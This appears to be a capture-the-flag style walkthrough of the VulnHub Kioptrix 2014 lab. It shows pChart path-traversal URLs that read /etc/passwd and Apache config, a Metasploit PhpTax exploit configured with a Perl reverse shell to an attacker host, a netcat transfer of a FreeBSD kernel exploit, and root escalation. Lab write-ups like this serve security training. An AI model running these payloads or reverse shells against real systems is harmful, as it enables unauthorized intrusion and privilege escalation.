Post cover image

April 21, 2026

Kioptrix: 2014 — VulnHub Walkthrough pChart LFI + PhpTax RCE to Root via FreeBSD Kernel Exploit

ROOM TYPE Difficulty → Intermediate Platform → VulnHub Focus → Local File Inclusion, Remote Code Execution, Kernel Exploitation

Punih3r7

2 min read

Task 1: Web Enumeration with Dirb

We start by running dirb to discover hidden directories and files on the target:

dirb http://192.168.229.140 /usr/share/dirb/wordlists/common.txt

Visiting the target in the browser and viewing the page source reveals a reference to pChart 2.1.3 — an outdated charting library with known vulnerabilities.

Task 2: Local File Inclusion via pChart

We search Exploit-DB and find a Local File Inclusion (LFI) vulnerability in pChart 2.1.3. We use it to read sensitive system files directly through the browser.

First we read /etc/passwd to confirm the vulnerability works:

http://192.168.229.140/pChart2.1.3/examples/index.php?Action=View&Script=%2F..%2F..%2Fetc/passwd

The response confirms the system is running FreeBSD 9.0. Next we read the Apache configuration file to discover any additional virtual hosts or open ports:

http://192.168.229.140/pChart2.1.3/examples/index.php?Action=View&Script=%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fapache22%2Fhttpd.conf

The Apache config reveals that port 8080 is open and serving another web application, but it is restricted to a specific User-Agent.

Task 3: Bypassing User-Agent Restriction

Port 8080 only accepts connections from a specific browser User-Agent. We use the User-Agent Switcher and Manager browser extension to spoof our User-Agent to:

Mozilla/4.0

Now we can access port 8080 in the browser and discover a PhpTax application:

http://192.168.229.140:8080
http://192.168.229.140:8080/phptax/

Task 4: Exploiting PhpTax — Remote Code Execution

We search Exploit-DB and find a known RCE vulnerability in PhpTax. We exploit it using Metasploit:

msfconsole -q
use exploit/multi/http/phptax_exec
show options
set RHOSTS 192.168.229.140
set RPORT 8080
set LHOST <attacker-ip>
show payloads
set payload payload/cmd/unix/reverse_perl

Since port 8080 has a User-Agent restriction, we must also set the correct User-Agent in the advanced options:

show advanced
set UserAgent Mozilla/4.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
exploit

We receive a reverse shell. We drop into a full shell session:

None

Task 5: Transferring the Kernel Exploit

We check if wget is available on the target:

wget

It is not installed on this FreeBSD system, so we use Netcat to transfer the exploit instead.

We search for a suitable FreeBSD 9.0 local privilege escalation exploit:

searchsploit 28718

We copy the exploit to our current directory:

searchsploit -m 28718

On our attacking machine, we serve the file through Netcat on a listening port:

nc -lvnp 4444 < 28718.c

From the Metasploit shell on the target, we pull the file across:

nc -nv <attacker-ip> 4444 > 28718.c

Task 6: Compiling & Running the Kernel Exploit

We compile the exploit directly on the target machine:

gcc 28718.c -o exploit

Then we execute it to escalate to root:

./exploit

We now have a root shell.

Final Flag

cd /root
ls
cat congrats.txt
None

Final Thoughts

Kioptrix 2014 is a well-rounded intermediate machine that chains multiple vulnerabilities together across a realistic attack path covering:

  • Web directory enumeration with dirb
  • Local File Inclusion exploitation via pChart
  • Apache configuration file reading to discover hidden services
  • User-Agent spoofing to bypass access restrictions
  • Remote code execution via PhpTax using Metasploit
  • Netcat-based file transfer as a wget alternative
  • FreeBSD kernel exploitation for privilege escalation